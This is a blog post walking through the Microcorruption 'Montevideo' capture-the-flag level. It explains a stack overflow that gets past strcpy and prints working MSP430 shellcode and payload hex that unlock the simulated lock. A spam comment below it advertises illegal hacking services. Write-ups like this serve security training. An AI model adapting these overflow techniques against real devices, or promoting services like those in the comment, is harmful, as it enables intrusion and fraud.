Monday, November 10, 2014

Microcorruption - Montevideo


Again, they have the same strange add 0x10 to the stack pointer at the very end of the execution of login. This allows us, as before, to overflow the buffer and inject a return address that we want. If this were a software version the address we could put in there would be “unlock door” but since this is a hardware version we have to again get 0x7F into the SR and call 0x10 <_trap_interrupt> to open the lock. Pretty much the same as before, so let's try the same code.

Of course it doesn't work, and as we can see they have added strcpy into the mix which effectively copies all information up to and including the null terminator – but it stops there. So we only get one occurrence of 00 and it has to be at the end.

But other than that our methodology should be intact, we just have to adjust the code. We can still have the filler up front, then the re-deirect to our code as before, but we have to be a little more creative to work around the 00 entries in our password.

Ideas:

So we have some filler, the address to our shell code, another bit of filler and then our code:

3f40 fffe mv #xfffe, r15 ← load fffe into register 15
1f53 increment r15 ← increment to ff00
024f mv r15, sr ← move to status register
b012 1000 call 0x10 ← has to be the last thing

So putting it together we have the following parts:
41414242434344444545464647474848 filler
0244 address to our
4141 filler
3f40fffe1f53024fb0121000 injected shell code
41414242434344444545464647474848024441413f40fffe1f53024fb0121000

Wow, that's a really long password. Perhaps we can think of something shorter?

So rather than inject our shell code after the password, why not make our shell code the password itself? At the end we can redirect the program counter (instruction pointer) to the start of our shell code. Of course we will need to watch out for null terminators which means we can't call 0x10 from inside, but the provided code already does for us at address 455c. All we have to do is jump there.

So, instead of starting our code with 4141 (AA) let's start with the injected code and as the filler. We also change the jump to address (to an address within the code that does it for itself). The last portion is the address where the beginning of the password is stored. Here's an entry that works and is much shorter.
3f40fffe1f53024fb0125c45   41414141    ee43

←           shell code          → ←  filler   → ← starting address of shell code →

Posted by at
Labels:

1 comment:

  1. UnknownMarch 21, 2019 at 4:00 AM

    Looking for a legit and professional hacker,cheap and affordables for the following ?
    -Tracking calls

    Facebook,whatsapp,snapchat,Skpye,twit
    ter,gmail
    hack
    -cell phone hack -Cloning of phones – Clearing
    criminal records
    without
    leaving traces
    -Changing school grades
    without leaving traces -Website hack -Retrieval of lost or
    hacked social media accounts
    etc. Contact (CYBER.LORD1010@gmail.com) one word
    for more hacking details.

    ReplyDelete

Subscribe to: Post Comments (Atom)